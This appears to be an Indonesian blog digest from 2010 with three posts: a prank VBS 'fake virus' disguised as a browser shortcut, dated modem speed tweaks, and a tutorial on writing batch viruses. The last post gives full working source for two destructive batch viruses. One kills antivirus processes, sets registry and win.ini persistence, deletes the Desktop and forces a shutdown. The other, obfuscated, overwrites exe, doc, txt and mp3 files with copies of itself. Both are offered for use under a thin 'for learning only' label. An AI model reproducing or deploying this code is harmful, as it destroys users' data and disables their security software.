ALL ABOUT VIRUS !!!!! |
- Membuat Fake Virus Pada Mozilla & IE dengan VBS
- Mempercepat Koneksi Internet
- Pemrograman Virus Batch
Membuat Fake Virus Pada Mozilla & IE dengan VBS Posted: 03 Apr 2010 09:48 PM PDT INI TIDAK MERUGIKAN KOMPUTER ANDA! heheheheh di sini adalah mantranya (simpan sebagai mozilla.vbs ato internet explorer.vbs): set WSHShell = WScript.CreateObject("WScript.Shell") WSHShell.Run "iexplore.Exe" On Error Resume Next Set wshShell = wscript.CreateObject("WScript.Shell") Dim Wsh Set Wsh = WScript.CreateObject("WScript.Shell") Set shell = CreateObject("Wscript.Shell") Set objScriptExec = objShell.Exec("shutdown -a") Set objShell = CreateObject("WScript.Shell") wscript.Sleep 1000 Wsh.Run "Notepad.Exe", 1 Wscript.Sleep 900 Wshshell.Sendkeys "(Loading)" Wscript.Sleep 125 Wshshell.Sendkeys "." Wscript.Sleep 125 Wshshell.Sendkeys "." Wscript.Sleep 125 Wshshell.Sendkeys "." Wscript.Sleep 125 Wshshell.Sendkeys "{bs}" Wscript.Sleep 125 Wshshell.Sendkeys "{bs}" Wscript.Sleep 125 Wshshell.Sendkeys "{bs}" Wscript.Sleep 125 Wshshell.Sendkeys "." Wscript.Sleep 125 Wshshell.Sendkeys "." Wscript.Sleep 125 Wshshell.Sendkeys "." Wshshell.Sendkeys "{bs}" Wscript.Sleep 125 Wshshell.Sendkeys "{bs}" Wscript.Sleep 125 Wshshell.Sendkeys "{bs}" Wscript.Sleep 125 Wshshell.Sendkeys "." Wscript.Sleep 125 Wshshell.Sendkeys "." Wscript.Sleep 125 Wshshell.Sendkeys "." Wscript.Sleep 125 Wshshell.Sendkeys "{bs}" Wscript.Sleep 125 Wshshell.Sendkeys "{bs}" Wscript.Sleep 125 Wshshell.Sendkeys "{bs}" Wscript.Sleep 800 Wshshell.Sendkeys "^a" Wshshell.Sendkeys "{bs}" Wshshell.Sendkeys "Virus Loaded" Wscript.Sleep 900 Wshshell.Sendkeys "^a" Wshshell.Sendkeys "{bs}" Wshshell.Sendkeys "%{f4}" Msgbox"Windows has detected a virus",16,"Virus detector" Wscript.Sleep 900 sembunyikan shortcut mozila dan IE yg asli di suatu tempat, dan kemudian tulis kan script yang ada diatas menggunakan notepad simpan dengan *.VBS, trus buat shortcut yang terlihat seperti mozilla dan IE. caranya : klik kanan file *.VBS>properties> shortcut> change icon (ganti dengan icon mozilla ato IE) Source : www.amhusite.co.cc/.../membuat-fake-virus-pada-mozilla-ie.html |
Posted: 03 Apr 2010 09:40 PM PDT Tahukah kamu bahwa kecepatan koneksi internet dapat kamu tingkatkan dengan mengubah beberapa setting tertentu pada Windows. Walaupun sekarang sudah banyak software-software untuk mempercepat koneksi internet saya kira kamu tidak akan rugi untuk mengetahui cara mempercepat secara "manual" seperti yang tercantum di bawah ini: Cara Pertama Dari Control Panel, klik icon Modem. Pada kotak dialog Modem Properties, pilih modem yang akan diubah settingnya dan klik pada tombol Properties Pada tab General, ubah Maximum Speed menjadi 115200. Pindah ke tab Connection dan klik tombol Port Setting. Dari kotak dialog Advanced Port Setting, beri tanda check pada Use FIFO buffers. Kemudian ubah Receive Buffer menjadi 14 dan Transmit Buffer menjadi 16. Lalu klik OK. Klik button Advanced, beri tanda check pada Use Flow Control. Kemudian pilih radio button Hardware. Pada bagian Extra Setting, isi dengan &C1&D2E1Q0V1X4%C0 S7=55 S11=55 S0=0. Cara Kedua Dari Control Panel, klik icon System. Pindah ke tab Device Manager. Pada bagian Ports (COM & LPT), pilih port yang digunakan oleh modem Anda dan klik tombol Properties. Pindah ke tab Port Settings. Pada bagian Bits per second, isi dengan 921600. Cara Ketiga Buka file system.ini yang terletak di C:\Windows. Pada bagian [386Enh], tambahkan dengan COM1Buffer=16384. Ubah COM1 dengan port yang digunakan oleh modem. |
Posted: 03 Apr 2010 09:31 PM PDT Kali ini saya akan berikan sedikit ilmu bagaimana cara membuat virus batch. Dulu virus ini ngetren sekali (kira-kira tahun 90-an lah). Tapi sekarang ini saya jarang nemuin virus ini berkeliaran… Virus batch dibuat di notepad dan disimpan dengan ekstensi ".bat". Ternyata selain virus VBS masih ada juga virus yang dibuat pake notepad. Yah salah satunya virus BAT (virus Batch). Kalo kmu hidupkan file notepad kosong dengan ekstensi ".bat", yang muncul malah "bla bla bla is not valid 32 application" Itu artinya kita harus masukkan code virus ke dalam tubuh file bat itu.. he he he he…. Kali ini akan saya ajarkan kalian… tapi ingat saya tidak bertanggung jawab atas kecerobohan kalian… Pertama sekali ketik: @echo off Yang itu memang mesti ditulis, supaya file tidak memunculkan seluruh command. Dan ini wajib (dianjurkan bozzz). Gak diketik begitu juga gak apa-apa sih sebenarnya… Baru setelah itu kita ketik code-code virus lainnya… he he he Ini contoh-contoh code-nya… Untuk meng-kill process yang aktif: Tskill AVGUARD Perhatikan: untuk meng-kill process ketik "tskill" lalu nama process-nya tapi tanpa ekstensi… Contoh lain: Tskill KAV Untuk menghapus file: del C:\Progra~1\Accessories\Ca lc.EXE Untuk menulis ke regedit: reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Morphix /t REG_SZ /d %systemroot%\Morphix.bat /f Untuk menampilkan messagebox Msg * "Tulis pesanmu disini" Dan masih banyak lagi contoh-contohnya…. Langsung aja neh salah satu virus batch : @ECHO OFF copy %0 %systemroot%\Morphix.bat > nul copy %0 *.bat > nul Attrib +h *.bat cls tskill AVGUARD tskill AVGNT tskill NMAIN tskill KAV tskill ad-aware tskill av* tskill PCMAV reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Mophix /t REG_SZ /d %systemroot%\Morphix.bat /f > nul cls echo [windows] >> %systemroot%\win.ini echo load=%systemroot%\Morphix.bat >> %systemroot%\win.ini echo run=%systemroot%\Morphix.bat >> %systemroot%\win.ini Attrib +h %systemroot%\win.ini del C:\docume~\owner\Desktop shutdown -s -t 15 msg * "Karena sesuatu hal komputer ini harus di-shutdown… Ha ha ha" cls :Morphix start %0 goto Morphix ::*Hanya untuk pembelajaran* mau liat source batch yang lainnya??? Nih virus batch Rawut @echo off rem c0d3d by Vires @ palu city rem If u wanna know how this worx rem don't follow the code from top to bottom rem but follow the flow of code rem is it beautiful???yes it is!!!! rem vires18[at]yahoo[dot]com rem (c)2007,Indonesia rem Dedicated to my Girl:eltietien(did u knew her b 4???) rem Greetz to all my friends rem cyrus,bdhamas,sat_anichell,einstein2,wau^wau,the_g irl rem xniffer, miyabi ,the_simpson,psycopath & all i forget rem sorry!!!!! goto v781i21r1212e23s4c5o677o85l :n56a19m75a0101011 %res%%c00l% %gal%* %gal%bat %l% pulangpalu :t45e18g14a11l %zhe% x=exe %zhe% c=com %zhe% fah=py %l% v25i85r19e0s :l08a80t19i85f08a19h %zhe% sya=att %zhe% gal=*. %zhe% vi=fo %sya%%res%%ah% %gal%* %s% %zhe% ti=co %l% t45e18g14a11l :v25i85r19e0s %zhe% d=txt %zhe% la=do %zhe% m=doc %vi%%res% %%r %te% (%gal%%x% %gal%%c% %gal%%d% %gal%%m% %gal%%lgu%) %la% %ti%%fah% %0 "%%r" %l% n56a19m75a0101011 :v18i17r16e15s %zhe% s=-%vi%s -%vi%r -%vi%h %zhe% res=r %zhe% c00l=en %l% l08a80t19i85f08a19h :v781i21r1212e23s4c5o677o85l set zhe=set %zhe% te=in %zhe% l=goto %zhe% ah=ib %zhe% lgu=mp3 %l% v18i17r16e15s palucity rem Heh,BATCH STILL BEAUTIFUL RIGHT???? rem (c)vires |
Email delivery powered by Google | |
Tidak ada komentar:
Posting Komentar